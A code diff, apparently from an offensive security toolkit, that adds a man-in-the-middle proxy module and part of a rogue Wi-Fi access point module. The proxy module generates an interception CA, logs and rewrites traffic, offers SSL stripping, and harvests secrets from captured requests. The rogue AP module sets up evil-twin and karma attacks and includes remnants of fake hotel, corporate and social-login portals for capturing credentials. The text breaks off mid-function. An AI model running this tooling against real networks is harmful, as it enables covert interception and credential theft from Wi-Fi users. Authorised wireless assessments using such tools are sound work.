8888 + self._upstream_proxy = None + self._ssl_strip = False + self._use_mitmdump = False + + # Rules engine + self._rules = [] + self._next_rule_id = 1 + + # Traffic log + self._traffic = [] + self._traffic_lock = threading.Lock() + self._next_traffic_id = 1 + self._request_count = 0 + + # Certificate storage + data_dir = Path(get_data_dir()) if callable(get_data_dir) else Path(get_data_dir) + self._mitm_dir = data_dir / 'mitm' + self._cert_dir = self._mitm_dir / 'certs' + self._rules_path = self._mitm_dir / 'rules.json' + self._traffic_path = self._mitm_dir / 'traffic.json' + + self._mitm_dir.mkdir(parents=True, exist_ok=True) + 
self._cert_dir.mkdir(parents=True, exist_ok=True) + + # Load persisted rules + self._load_rules() + + # ── Proxy Lifecycle ────────────────────────────────────────────── + + def start(self, listen_host='127.0.0.1', listen_port=8888, upstream_proxy=None): + """Start the MITM proxy. + + Tries mitmdump first; falls back to built-in proxy. + Returns dict with status info. + """ + if self._running: + return {'success': False, 'error': 'Proxy already running', + 'host': self._listen_host, 'port': self._listen_port} + + self._listen_host = listen_host + self._listen_port = int(listen_port) + + # Parse upstream proxy + if upstream_proxy: + upstream_proxy = upstream_proxy.strip() + if upstream_proxy: + parts = upstream_proxy.replace('http://', '').replace('https://', '') + if ':' in parts: + h, p = parts.rsplit(':', 1) + try: + self._upstream_proxy = (h, int(p)) + except ValueError: + self._upstream_proxy = None + else: + self._upstream_proxy = (parts, 8080) + else: + self._upstream_proxy = None + + # Try mitmdump first + mitmdump_path = find_tool('mitmdump') + if mitmdump_path: + return self._start_mitmdump(mitmdump_path) + + # Fall back to built-in proxy + return self._start_builtin() + + def _start_mitmdump(self, mitmdump_path): + """Start proxy using mitmdump subprocess.""" + cmd = [ + mitmdump_path, + '--listen-host', self._listen_host, + '--listen-port', str(self._listen_port), + '--set', 'flow_detail=0', + '--set', f'confdir={str(self._cert_dir)}', + ] + + if self._upstream_proxy: + cmd.extend(['--mode', f'upstream:http://{self._upstream_proxy[0]}:{self._upstream_proxy[1]}']) + + if self._ssl_strip: + cmd.extend(['--ssl-insecure']) + + try: + self._process = subprocess.Popen( + cmd, + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + creationflags=getattr(subprocess, 'CREATE_NO_WINDOW', 0) + ) + time.sleep(1.0) + + if self._process.poll() is not None: + stderr = self._process.stderr.read().decode('utf-8', errors='replace') + return {'success': False, 'error': 
f'mitmdump exited: {stderr}'} + + self._running = True + self._use_mitmdump = True + return { + 'success': True, + 'message': f'Proxy started (mitmdump) on {self._listen_host}:{self._listen_port}', + 'host': self._listen_host, + 'port': self._listen_port, + 'engine': 'mitmdump', + 'pid': self._process.pid, + } + except Exception as e: + return {'success': False, 'error': f'Failed to start mitmdump: {str(e)}'} + + def _start_builtin(self): + """Start proxy using built-in HTTP server.""" + try: + _ProxyRequestHandler.mitm = self + + server = http.server.HTTPServer( + (self._listen_host, self._listen_port), + _ProxyRequestHandler + ) + server.timeout = 1 + + self._server = server + self._running = True + self._use_mitmdump = False + + def serve(): + while self._running: + try: + server.handle_request() + except Exception: + if self._running: + continue + break + + self._server_thread = threading.Thread(target=serve, daemon=True, + name='mitm-proxy') + self._server_thread.start() + + return { + 'success': True, + 'message': f'Proxy started (built-in) on {self._listen_host}:{self._listen_port}', + 'host': self._listen_host, + 'port': self._listen_port, + 'engine': 'builtin', + } + except OSError as e: + self._running = False + return {'success': False, 'error': f'Failed to bind {self._listen_host}:{self._listen_port}: {str(e)}'} + except Exception as e: + self._running = False + return {'success': False, 'error': f'Failed to start proxy: {str(e)}'} + + def stop(self): + """Stop the MITM proxy.""" + if not self._running: + return {'success': False, 'error': 'Proxy is not running'} + + self._running = False + + # Kill mitmdump process + if self._process: + try: + self._process.terminate() + self._process.wait(timeout=5) + except Exception: + try: + self._process.kill() + except Exception: + pass + self._process = None + + # Shutdown built-in server + if self._server: + try: + self._server.server_close() + except Exception: + pass + self._server = None + + if 
self._server_thread: + self._server_thread.join(timeout=3) + self._server_thread = None + + _ProxyRequestHandler.mitm = None + + return {'success': True, 'message': 'Proxy stopped'} + + def is_running(self): + """Check if proxy is active.""" + if self._process: + if self._process.poll() is not None: + self._running = False + self._process = None + return self._running + + def get_status(self): + """Return proxy status information.""" + return { + 'running': self.is_running(), + 'host': self._listen_host, + 'port': self._listen_port, + 'engine': 'mitmdump' if self._use_mitmdump else 'builtin', + 'request_count': self._request_count, + 'traffic_entries': len(self._traffic), + 'rules_count': len(self._rules), + 'ssl_strip': self._ssl_strip, + 'upstream_proxy': f'{self._upstream_proxy[0]}:{self._upstream_proxy[1]}' if self._upstream_proxy else None, + 'pid': self._process.pid if self._process else None, + } + + # ── Certificate Management ─────────────────────────────────────── + + def generate_ca_cert(self): + """Generate a CA certificate for HTTPS interception. + + Uses the cryptography library to create a self-signed CA cert. + Returns dict with cert info or error. 
+ """ + try: + from cryptography import x509 + from cryptography.x509.oid import NameOID + from cryptography.hazmat.primitives import hashes, serialization + from cryptography.hazmat.primitives.asymmetric import rsa + from cryptography.hazmat.backends import default_backend + import datetime as dt + + # Generate RSA private key + key = rsa.generate_private_key( + public_exponent=65537, + key_size=2048, + backend=default_backend() + ) + + # Build CA certificate + subject = issuer = x509.Name([ + x509.NameAttribute(NameOID.COUNTRY_NAME, 'US'), + x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, 'Cyberspace'), + x509.NameAttribute(NameOID.ORGANIZATION_NAME, 'AUTARCH MITM CA'), + x509.NameAttribute(NameOID.COMMON_NAME, 'AUTARCH Interception CA'), + ]) + + cert = ( + x509.CertificateBuilder() + .subject_name(subject) + .issuer_name(issuer) + .public_key(key.public_key()) + .serial_number(x509.random_serial_number()) + .not_valid_before(dt.datetime.utcnow()) + .not_valid_after(dt.datetime.utcnow() + dt.timedelta(days=3650)) + .add_extension( + x509.BasicConstraints(ca=True, path_length=0), + critical=True, + ) + .add_extension( + x509.KeyUsage( + digital_signature=True, key_cert_sign=True, + crl_sign=True, key_encipherment=False, + content_commitment=False, data_encipherment=False, + key_agreement=False, encipher_only=False, + decipher_only=False + ), + critical=True, + ) + .sign(key, hashes.SHA256(), default_backend()) + ) + + # Save private key + key_path = self._cert_dir / 'ca-key.pem' + with open(key_path, 'wb') as f: + f.write(key.private_bytes( + encoding=serialization.Encoding.PEM, + format=serialization.PrivateFormat.TraditionalOpenSSL, + encryption_algorithm=serialization.NoEncryption() + )) + + # Save certificate + cert_path = self._cert_dir / 'ca-cert.pem' + with open(cert_path, 'wb') as f: + f.write(cert.public_bytes(serialization.Encoding.PEM)) + + # Save DER format for browser import + der_path = self._cert_dir / 'ca-cert.der' + with open(der_path, 'wb') 
as f: + f.write(cert.public_bytes(serialization.Encoding.DER)) + + return { + 'success': True, + 'message': 'CA certificate generated', + 'cert_path': str(cert_path), + 'key_path': str(key_path), + 'der_path': str(der_path), + 'subject': 'AUTARCH Interception CA', + 'valid_days': 3650, + } + + except ImportError: + return {'success': False, 'error': 'cryptography library not installed (pip install cryptography)'} + except Exception as e: + return {'success': False, 'error': f'Failed to generate certificate: {str(e)}'} + + def get_ca_cert(self): + """Return CA certificate content for client installation.""" + cert_path = self._cert_dir / 'ca-cert.pem' + der_path = self._cert_dir / 'ca-cert.der' + + if not cert_path.exists(): + return {'success': False, 'error': 'No CA certificate found. Generate one first.'} + + try: + with open(cert_path, 'r') as f: + pem_data = f.read() + + result = { + 'success': True, + 'pem': pem_data, + 'pem_path': str(cert_path), + } + + if der_path.exists(): + import base64 + with open(der_path, 'rb') as f: + result['der_b64'] = base64.b64encode(f.read()).decode('ascii') + result['der_path'] = str(der_path) + + return result + + except Exception as e: + return {'success': False, 'error': f'Failed to read certificate: {str(e)}'} + + def get_certs(self): + """List generated interception certificates.""" + certs = [] + if self._cert_dir.exists(): + for f in sorted(self._cert_dir.iterdir()): + if f.is_file(): + stat = f.stat() + certs.append({ + 'name': f.name, + 'size': stat.st_size, + 'modified': datetime.fromtimestamp(stat.st_mtime).isoformat(), + 'path': str(f), + }) + return certs + + # ── Rules Engine ───────────────────────────────────────────────── + + def add_rule(self, rule): + """Add a modification rule. 
+ + Rule dict keys: + match_url: regex pattern to match URL + match_method: HTTP method or 'ANY' + action: modify_header | modify_body | inject_header | redirect | block + params: dict with action-specific parameters + """ + rule_entry = { + 'id': self._next_rule_id, + 'match_url': rule.get('match_url', '.*'), + 'match_method': rule.get('match_method', 'ANY'), + 'action': rule.get('action', 'block'), + 'params': rule.get('params', {}), + 'enabled': True, + 'created': datetime.now().isoformat(), + } + + # Validate regex + try: + re.compile(rule_entry['match_url']) + except re.error as e: + return {'success': False, 'error': f'Invalid URL pattern: {str(e)}'} + + # Validate action + valid_actions = ('modify_header', 'modify_body', 'inject_header', 'redirect', 'block') + if rule_entry['action'] not in valid_actions: + return {'success': False, 'error': f'Invalid action. Must be one of: {", ".join(valid_actions)}'} + + self._rules.append(rule_entry) + self._next_rule_id += 1 + self._save_rules() + + return {'success': True, 'rule': rule_entry} + + def remove_rule(self, rule_id): + """Remove a rule by ID.""" + rule_id = int(rule_id) + for i, rule in enumerate(self._rules): + if rule['id'] == rule_id: + removed = self._rules.pop(i) + self._save_rules() + return {'success': True, 'removed': removed} + return {'success': False, 'error': f'Rule {rule_id} not found'} + + def list_rules(self): + """List all active rules.""" + return self._rules + + def enable_rule(self, rule_id): + """Enable a rule.""" + rule_id = int(rule_id) + for rule in self._rules: + if rule['id'] == rule_id: + rule['enabled'] = True + self._save_rules() + return {'success': True, 'rule': rule} + return {'success': False, 'error': f'Rule {rule_id} not found'} + + def disable_rule(self, rule_id): + """Disable a rule.""" + rule_id = int(rule_id) + for rule in self._rules: + if rule['id'] == rule_id: + rule['enabled'] = False + self._save_rules() + return {'success': True, 'rule': rule} + return {'success': 
False, 'error': f'Rule {rule_id} not found'} + + def _save_rules(self): + """Persist rules to disk.""" + try: + with open(self._rules_path, 'w') as f: + json.dump(self._rules, f, indent=2) + except Exception: + pass + + def _load_rules(self): + """Load rules from disk.""" + if self._rules_path.exists(): + try: + with open(self._rules_path, 'r') as f: + self._rules = json.load(f) + if self._rules: + self._next_rule_id = max(r.get('id', 0) for r in self._rules) + 1 + except Exception: + self._rules = [] + + # ── Traffic Logging ────────────────────────────────────────────── + + def _log_traffic(self, method, url, status, req_headers, req_body, + resp_headers, resp_body, size, start_time): + """Log a traffic entry.""" + duration = round((time.time() - start_time) * 1000, 1) + + # Safely encode body content for JSON storage + def safe_body(body): + if body is None: + return '' + if isinstance(body, bytes): + try: + return body.decode('utf-8', errors='replace')[:10000] + except Exception: + return f'' + return str(body)[:10000] + + # Detect secrets + secrets = self._scan_for_secrets(req_headers, req_body, resp_headers, resp_body) + + entry = { + 'id': self._next_traffic_id, + 'timestamp': datetime.now().isoformat(), + 'method': method, + 'url': url, + 'status': status, + 'request_headers': dict(req_headers) if isinstance(req_headers, dict) else {}, + 'request_body': safe_body(req_body), + 'response_headers': dict(resp_headers) if isinstance(resp_headers, dict) else {}, + 'response_body': safe_body(resp_body), + 'size': size, + 'duration': duration, + 'secrets_found': secrets, + } + + with self._traffic_lock: + self._traffic.append(entry) + self._next_traffic_id += 1 + self._request_count += 1 + + # Keep max 10000 entries in memory + if len(self._traffic) > 10000: + self._traffic = self._traffic[-5000:] + + def get_traffic(self, limit=100, offset=0, filter_url=None, filter_method=None, + filter_status=None): + """Return captured traffic entries with optional 
filtering.""" + with self._traffic_lock: + entries = list(self._traffic) + + # Apply filters + if filter_url: + try: + pattern = re.compile(filter_url, re.IGNORECASE) + entries = [e for e in entries if pattern.search(e.get('url', ''))] + except re.error: + entries = [e for e in entries if filter_url.lower() in e.get('url', '').lower()] + + if filter_method: + entries = [e for e in entries if e.get('method', '').upper() == filter_method.upper()] + + if filter_status: + try: + status_code = int(filter_status) + entries = [e for e in entries if e.get('status') == status_code] + except (ValueError, TypeError): + pass + + # Sort by most recent first + entries = list(reversed(entries)) + + total = len(entries) + entries = entries[offset:offset + limit] + + # Strip bodies from list view for performance + summary = [] + for e in entries: + summary.append({ + 'id': e['id'], + 'timestamp': e['timestamp'], + 'method': e['method'], + 'url': e['url'][:200], + 'status': e['status'], + 'size': e['size'], + 'duration': e['duration'], + 'secrets_found': len(e.get('secrets_found', [])) > 0, + }) + + return {'entries': summary, 'total': total, 'limit': limit, 'offset': offset} + + def get_request(self, request_id): + """Get full request/response details for a traffic entry.""" + request_id = int(request_id) + with self._traffic_lock: + for entry in self._traffic: + if entry['id'] == request_id: + return {'success': True, 'entry': entry} + return {'success': False, 'error': f'Request {request_id} not found'} + + def clear_traffic(self): + """Clear traffic log.""" + with self._traffic_lock: + self._traffic.clear() + self._request_count = 0 + return {'success': True, 'message': 'Traffic log cleared'} + + def export_traffic(self, fmt='json'): + """Export traffic log.""" + with self._traffic_lock: + entries = list(self._traffic) + + if fmt == 'json': + return { + 'success': True, + 'format': 'json', + 'data': json.dumps(entries, indent=2), + 'count': len(entries), + } + elif fmt == 'csv': 
+ import io + import csv + output = io.StringIO() + writer = csv.writer(output) + writer.writerow(['id', 'timestamp', 'method', 'url', 'status', + 'size', 'duration', 'secrets']) + for e in entries: + writer.writerow([ + e['id'], e['timestamp'], e['method'], e['url'], + e['status'], e['size'], e['duration'], + len(e.get('secrets_found', [])) + ]) + return { + 'success': True, + 'format': 'csv', + 'data': output.getvalue(), + 'count': len(entries), + } + else: + return {'success': False, 'error': f'Unsupported format: {fmt}'} + + # ── Secret Detection ───────────────────────────────────────────── + + def _scan_for_secrets(self, req_headers, req_body, resp_headers, resp_body): + """Scan request/response for secrets and sensitive data.""" + secrets = [] + search_texts = [] + + # Collect all text to scan + if isinstance(req_headers, dict): + for k, v in req_headers.items(): + search_texts.append(f'{k}: {v}') + if req_body: + if isinstance(req_body, bytes): + try: + search_texts.append(req_body.decode('utf-8', errors='replace')) + except Exception: + pass + else: + search_texts.append(str(req_body)) + + if isinstance(resp_headers, dict): + for k, v in resp_headers.items(): + search_texts.append(f'{k}: {v}') + if resp_body: + if isinstance(resp_body, bytes): + try: + search_texts.append(resp_body.decode('utf-8', errors='replace')) + except Exception: + pass + else: + search_texts.append(str(resp_body)) + + combined = '\n'.join(search_texts) + + for pattern, label in _COMPILED_SECRETS: + matches = pattern.findall(combined) + for match in matches: + value = match if isinstance(match, str) else match[0] + # Mask the secret value for display + if len(value) > 8: + masked = value[:4] + '*' * (len(value) - 8) + value[-4:] + else: + masked = value[:2] + '*' * (len(value) - 2) + secrets.append({ + 'type': label, + 'value_masked': masked, + 'location': 'request/response', + }) + + return secrets + + def find_secrets(self, traffic_entry): + """Scan a specific traffic entry for 
secrets. Returns list of findings.""" + if isinstance(traffic_entry, (int, str)): + result = self.get_request(traffic_entry) + if not result.get('success'): + return [] + traffic_entry = result['entry'] + + return self._scan_for_secrets( + traffic_entry.get('request_headers', {}), + traffic_entry.get('request_body', ''), + traffic_entry.get('response_headers', {}), + traffic_entry.get('response_body', ''), + ) + + # ── SSL Strip ──────────────────────────────────────────────────── + + def ssl_strip_mode(self, enabled=True): + """Toggle SSL stripping (rewrite HTTPS links to HTTP).""" + self._ssl_strip = bool(enabled) + return { + 'success': True, + 'ssl_strip': self._ssl_strip, + 'message': f'SSL stripping {"enabled" if self._ssl_strip else "disabled"}', + } + + # ── CLI Interface ──────────────────────────────────────────────── + + def run(self): + """Interactive CLI for the MITM Proxy module.""" + while True: + clear_screen() + display_banner() + print(f"\n{Colors.BOLD}{Colors.RED}MITM Proxy{Colors.RESET}") + print(f"{Colors.DIM}HTTP(S) interception proxy & traffic analysis{Colors.RESET}\n") + + status = self.get_status() + if status['running']: + print(f"{Colors.GREEN}[+] Proxy RUNNING on {status['host']}:{status['port']}" + f" ({status['engine']}){Colors.RESET}") + print(f" Requests: {status['request_count']} | " + f"Rules: {status['rules_count']} | " + f"SSL Strip: {'ON' if status['ssl_strip'] else 'OFF'}") + if status['upstream_proxy']: + print(f" Upstream: {status['upstream_proxy']}") + else: + print(f"{Colors.YELLOW}[-] Proxy STOPPED{Colors.RESET}") + + print(f"\n{Colors.CYAN}1{Colors.RESET} Start Proxy") + print(f"{Colors.CYAN}2{Colors.RESET} Stop Proxy") + print(f"{Colors.CYAN}3{Colors.RESET} Add Rule") + print(f"{Colors.CYAN}4{Colors.RESET} View Traffic") + print(f"{Colors.CYAN}5{Colors.RESET} Find Secrets") + print(f"{Colors.CYAN}6{Colors.RESET} Generate CA Certificate") + print(f"{Colors.CYAN}7{Colors.RESET} Toggle SSL Strip") + 
print(f"{Colors.CYAN}8{Colors.RESET} List Rules") + print(f"{Colors.CYAN}0{Colors.RESET} Back\n") + + try: + choice = input(f"{Colors.WHITE}Choice: {Colors.RESET}").strip() + except (EOFError, KeyboardInterrupt): + break + + if choice == '0': + break + + elif choice == '1': + if status['running']: + print(f"\n{Colors.YELLOW}Proxy is already running.{Colors.RESET}") + else: + host = input(f"Listen host [{self._listen_host}]: ").strip() or self._listen_host + port = input(f"Listen port [{self._listen_port}]: ").strip() or str(self._listen_port) + upstream = input("Upstream proxy (host:port, blank for none): ").strip() or None + result = self.start(host, int(port), upstream) + if result['success']: + print(f"\n{Colors.GREEN}[+] {result['message']}{Colors.RESET}") + else: + print(f"\n{Colors.RED}[-] {result['error']}{Colors.RESET}") + + elif choice == '2': + result = self.stop() + if result['success']: + print(f"\n{Colors.GREEN}[+] {result['message']}{Colors.RESET}") + else: + print(f"\n{Colors.YELLOW}[-] {result['error']}{Colors.RESET}") + + elif choice == '3': + print(f"\n{Colors.BOLD}Add Modification Rule{Colors.RESET}") + url_pattern = input("URL pattern (regex): ").strip() or '.*' + method = input("Method filter (GET/POST/ANY): ").strip().upper() or 'ANY' + print("Actions: block, redirect, modify_header, inject_header, modify_body") + action = input("Action: ").strip().lower() + params = {} + if action == 'redirect': + params['target_url'] = input("Redirect URL: ").strip() + elif action in ('modify_header', 'inject_header'): + params['header_name'] = input("Header name: ").strip() + params['header_value'] = input("Header value: ").strip() + elif action == 'modify_body': + params['search'] = input("Search string: ").strip() + params['replace'] = input("Replace with: ").strip() + + result = self.add_rule({ + 'match_url': url_pattern, + 'match_method': method, + 'action': action, + 'params': params, + }) + if result['success']: + print(f"\n{Colors.GREEN}[+] Rule 
added (ID: {result['rule']['id']}){Colors.RESET}") + else: + print(f"\n{Colors.RED}[-] {result['error']}{Colors.RESET}") + + elif choice == '4': + traffic = self.get_traffic(limit=20) + entries = traffic.get('entries', []) + if not entries: + print(f"\n{Colors.YELLOW}No traffic captured yet.{Colors.RESET}") + else: + print(f"\n{Colors.BOLD}Recent Traffic ({traffic['total']} total){Colors.RESET}\n") + print(f"{'ID':>5} {'Method':<8} {'Status':<7} {'Size':>8} {'URL'}") + print("-" * 80) + for e in entries: + secrets_flag = ' *' if e.get('secrets_found') else '' + print(f"{e['id']:>5} {e['method']:<8} {e['status']:<7} " + f"{e['size']:>8} {e['url'][:50]}{secrets_flag}") + + elif choice == '5': + traffic = self.get_traffic(limit=1000) + entries = traffic.get('entries', []) + found = [e for e in entries if e.get('secrets_found')] + if not found: + print(f"\n{Colors.YELLOW}No secrets found in captured traffic.{Colors.RESET}") + else: + print(f"\n{Colors.RED}[!] Secrets found in {len(found)} requests:{Colors.RESET}\n") + for e in found: + req = self.get_request(e['id']) + if req.get('success'): + full = req['entry'] + for s in full.get('secrets_found', []): + print(f" {Colors.YELLOW}{s['type']}{Colors.RESET}: " + f"{s['value_masked']} ({full['method']} {full['url'][:60]})") + + elif choice == '6': + result = self.generate_ca_cert() + if result['success']: + print(f"\n{Colors.GREEN}[+] {result['message']}{Colors.RESET}") + print(f" Cert: {result['cert_path']}") + print(f" Key: {result['key_path']}") + else: + print(f"\n{Colors.RED}[-] {result['error']}{Colors.RESET}") + + elif choice == '7': + self._ssl_strip = not self._ssl_strip + state = 'ENABLED' if self._ssl_strip else 'DISABLED' + color = Colors.GREEN if self._ssl_strip else Colors.YELLOW + print(f"\n{color}[*] SSL Strip mode {state}{Colors.RESET}") + + elif choice == '8': + rules = self.list_rules() + if not rules: + print(f"\n{Colors.YELLOW}No rules configured.{Colors.RESET}") + else: + 
print(f"\n{Colors.BOLD}Active Rules{Colors.RESET}\n") + for r in rules: + state = f"{Colors.GREEN}ON{Colors.RESET}" if r['enabled'] else f"{Colors.RED}OFF{Colors.RESET}" + print(f" [{r['id']}] {state} {r['action']:<15} " + f"{r['match_method']:<6} {r['match_url']}") + + if choice in ('1', '2', '3', '4', '5', '6', '7', '8'): + try: + input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}") + except (EOFError, KeyboardInterrupt): + break + + +# ==================== SINGLETON ==================== + +_mitm_proxy_instance = None + + +def get_mitm_proxy(): + """Get or create singleton MITMProxy instance.""" + global _mitm_proxy_instance + if _mitm_proxy_instance is None: + _mitm_proxy_instance = MITMProxy() + return _mitm_proxy_instance + + +def run(): + get_mitm_proxy().run() + + +if __name__ == "__main__": + run() diff --git a/modules/pineapple.py b/modules/pineapple.py new file mode 100644 index 0000000..c0ad1cb --- /dev/null +++ b/modules/pineapple.py @@ -0,0 +1,1669 @@ +"""AUTARCH WiFi Pineapple / Rogue AP + +Evil twin AP, captive portal, karma attack, client MITM, +DNS spoofing, and credential capture for wireless assessments. +Designed for Raspberry Pi and SBCs with dual WiFi or WiFi + Ethernet. +""" + +DESCRIPTION = "Rogue AP — evil twin, captive portal, karma attacks" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import shutil +import signal +import threading +import subprocess +from pathlib import Path +from datetime import datetime +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Captive Portal HTML Templates ──────────────────────────────────────────── + +CAPTIVE_PORTAL_TEMPLATES = { + 'hotel_wifi': ''' + + + + +Hotel WiFi — Guest Portal + + + +
+

Welcome to Our Hotel

+Enter your room details to connect to the internet. +
+ + + + + + + +
+ +
+ +''', + + 'corporate': ''' + + + + +Corporate Network — Authentication + + + +
+ +

Network Authentication

+Sign in with your corporate credentials to access the network. +
+ + + + + + + +
+
This is a monitored network. Unauthorized access is prohibited.
+ +
+ +''', + + 'social_login': ''' + + + + +Free WiFi — Connect + + + +
+

Free WiFi Hotspot

+Sign in to get connected. +
+ + +
or sign in with email
+ + + + + +
+ +
+ +''', + + 'terms_accept': ''' + + + + +WiFi — Accept Terms + + + +
+

WiFi Access

+Please accept the terms of service to connect. +
+

Terms of Service

+

1. This wireless network is provided for authorized use only. By accessing this network, you agree to be bound by these terms.

+

2. You agree not to engage in any illegal or unauthorized activity while using this network. All network traffic may be monitored and logged.

+

3. The network provider is not responsible for any data loss, security breaches, or damages resulting from use of this network.

+

4. You acknowledge that this is a shared network and that data transmitted may be visible to other users. Use of VPN is recommended for sensitive communications.

+

5. The provider reserves the right to terminate access at any time without notice for any violation of these terms.

+

6. Maximum bandwidth allocation applies. Streaming and large downloads may be throttled during peak hours.

+

7. You agree to provide accurate registration information.

+
+
+ +
+ + +
+
+ + +
+ + +
+ +
+ +''', +} + +PORTAL_SUCCESS_PAGE = ''' + + + + +Connected + + + +
+
+

Connected Successfully

+

You are now connected to the internet. You may close this page and begin browsing.

+
+ +''' + + +# ── Pineapple AP Class ─────────────────────────────────────────────────────── + +class PineappleAP: + """WiFi Pineapple / Rogue AP controller.""" + + _instance = None + + def __init__(self): + data_dir = get_data_dir() + if isinstance(data_dir, Path): + data_dir = str(data_dir) + self.data_dir = os.path.join(data_dir, 'pineapple') + os.makedirs(self.data_dir, exist_ok=True) + + self.configs_dir = os.path.join(self.data_dir, 'configs') + os.makedirs(self.configs_dir, exist_ok=True) + self.captures_dir = os.path.join(self.data_dir, 'captures') + os.makedirs(self.captures_dir, exist_ok=True) + self.traffic_dir = os.path.join(self.data_dir, 'traffic') + os.makedirs(self.traffic_dir, exist_ok=True) + + # Tool paths + self.hostapd = find_tool('hostapd') or shutil.which('hostapd') + self.dnsmasq = find_tool('dnsmasq') or shutil.which('dnsmasq') + self.iptables = find_tool('iptables') or shutil.which('iptables') + self.nftables = find_tool('nft') or shutil.which('nft') + self.airbase = find_tool('airbase-ng') or shutil.which('airbase-ng') + self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng') + self.sslstrip_bin = find_tool('sslstrip') or shutil.which('sslstrip') + self.tcpdump = find_tool('tcpdump') or shutil.which('tcpdump') + self.iwconfig_bin = shutil.which('iwconfig') + self.iw_bin = shutil.which('iw') + self.ip_bin = shutil.which('ip') + + # State + self._ap_running = False + self._ap_ssid = '' + self._ap_channel = 6 + self._ap_interface = '' + self._internet_interface = '' + self._hostapd_proc: Optional[subprocess.Popen] = None + self._dnsmasq_proc: Optional[subprocess.Popen] = None + self._portal_active = False + self._portal_type = '' + self._karma_active = False + self._karma_proc: Optional[subprocess.Popen] = None + self._sslstrip_proc: Optional[subprocess.Popen] = None + self._sslstrip_active = False + self._sniff_proc: Optional[subprocess.Popen] = None + self._dns_spoofs: Dict[str, str] = {} + self._dns_spoof_active = False + 
self._clients: Dict[str, Dict] = {} + self._portal_captures: List[Dict] = [] + self._traffic_stats: Dict[str, Any] = { + 'total_bytes': 0, 'top_domains': {}, 'top_clients': {} + } + self._lock = threading.Lock() + + # Load persisted captures + self._load_captures() + + # ── Interface Management ───────────────────────────────────────────── + + def get_interfaces(self) -> List[Dict]: + """List wireless interfaces with driver info, mode, channel.""" + interfaces = [] + + # Try iw first + if self.iw_bin: + try: + out = subprocess.check_output( + [self.iw_bin, 'dev'], text=True, timeout=5, + stderr=subprocess.DEVNULL + ) + current_phy = '' + iface = None + for line in out.splitlines(): + stripped = line.strip() + if stripped.startswith('phy#'): + current_phy = stripped + elif stripped.startswith('Interface'): + if iface: + interfaces.append(iface) + iface = { + 'name': stripped.split()[-1], + 'mode': 'managed', + 'channel': 0, + 'mac': '', + 'phy': current_phy, + 'driver': '' + } + elif iface: + if stripped.startswith('type'): + iface['mode'] = stripped.split()[-1] + elif stripped.startswith('channel'): + try: + iface['channel'] = int(stripped.split()[1]) + except (ValueError, IndexError): + pass + elif stripped.startswith('addr'): + iface['mac'] = stripped.split()[-1] + if iface: + interfaces.append(iface) + except Exception: + pass + + # Get driver info from /sys + for iface in interfaces: + try: + driver_link = Path(f'/sys/class/net/{iface["name"]}/device/driver') + if driver_link.exists(): + iface['driver'] = os.path.basename(os.readlink(str(driver_link))) + except Exception: + pass + + # Fallback to iwconfig + if not interfaces and self.iwconfig_bin: + try: + out = subprocess.check_output( + [self.iwconfig_bin], text=True, + stderr=subprocess.DEVNULL, timeout=5 + ) + for block in out.split('\n\n'): + if 'IEEE 802.11' in block or 'ESSID' in block: + name = block.split()[0] + mode = 'managed' + if 'Mode:Monitor' in block: + mode = 'monitor' + elif 'Mode:Master' in 
block: + mode = 'master' + ch_m = re.search(r'Channel[:\s]*(\d+)', block) + ch = int(ch_m.group(1)) if ch_m else 0 + interfaces.append({ + 'name': name, 'mode': mode, 'channel': ch, + 'mac': '', 'phy': '', 'driver': '' + }) + except Exception: + pass + + # Fallback: /sys/class/net + if not interfaces: + try: + wireless_dir = Path('/sys/class/net') + if wireless_dir.exists(): + for d in wireless_dir.iterdir(): + if (d / 'wireless').exists() or (d / 'phy80211').exists(): + driver = '' + try: + dl = d / 'device' / 'driver' + if dl.exists(): + driver = os.path.basename(os.readlink(str(dl))) + except Exception: + pass + interfaces.append({ + 'name': d.name, 'mode': 'unknown', 'channel': 0, + 'mac': '', 'phy': '', 'driver': driver + }) + except Exception: + pass + + # Also list non-wireless interfaces (for internet_interface) + # Tag each with 'wireless': True/False + wireless_names = {i['name'] for i in interfaces} + for iface in interfaces: + iface['wireless'] = True + + try: + net_dir = Path('/sys/class/net') + if net_dir.exists(): + for d in net_dir.iterdir(): + if d.name not in wireless_names and d.name != 'lo': + # Check if it's up and has carrier + try: + operstate = (d / 'operstate').read_text().strip() + except Exception: + operstate = 'unknown' + interfaces.append({ + 'name': d.name, 'mode': operstate, + 'channel': 0, 'mac': '', 'phy': '', + 'driver': '', 'wireless': False + }) + except Exception: + pass + + return interfaces + + def get_tools_status(self) -> Dict[str, bool]: + """Check availability of all required tools.""" + return { + 'hostapd': self.hostapd is not None, + 'dnsmasq': self.dnsmasq is not None, + 'iptables': self.iptables is not None, + 'nft': self.nftables is not None, + 'airbase-ng': self.airbase is not None, + 'aireplay-ng': self.aireplay is not None, + 'sslstrip': self.sslstrip_bin is not None, + 'tcpdump': self.tcpdump is not None, + 'iw': self.iw_bin is not None, + 'ip': self.ip_bin is not None, + } + + # ── Rogue AP 
───────────────────────────────────────────────────────── + + def start_rogue_ap(self, ssid: str, interface: str, channel: int = 6, + encryption: str = 'open', password: str = None, + internet_interface: str = None) -> Dict: + """Configure and start hostapd-based rogue access point.""" + if self._ap_running: + return {'ok': False, 'error': 'AP is already running. Stop it first.'} + if not self.hostapd: + return {'ok': False, 'error': 'hostapd not found. Install with: apt install hostapd'} + if not self.dnsmasq: + return {'ok': False, 'error': 'dnsmasq not found. Install with: apt install dnsmasq'} + if not ssid or not interface: + return {'ok': False, 'error': 'SSID and interface are required'} + + try: + # Build hostapd configuration + hostapd_conf = os.path.join(self.configs_dir, 'hostapd.conf') + conf_lines = [ + f'interface={interface}', + f'ssid={ssid}', + f'channel={channel}', + 'driver=nl80211', + 'hw_mode=g', + 'wmm_enabled=0', + 'macaddr_acl=0', + 'auth_algs=1', + 'ignore_broadcast_ssid=0', + ] + + if encryption == 'wpa2' and password: + conf_lines.extend([ + 'wpa=2', + 'wpa_key_mgmt=WPA-PSK', + f'wpa_passphrase={password}', + 'rsn_pairwise=CCMP', + ]) + elif encryption == 'wpa' and password: + conf_lines.extend([ + 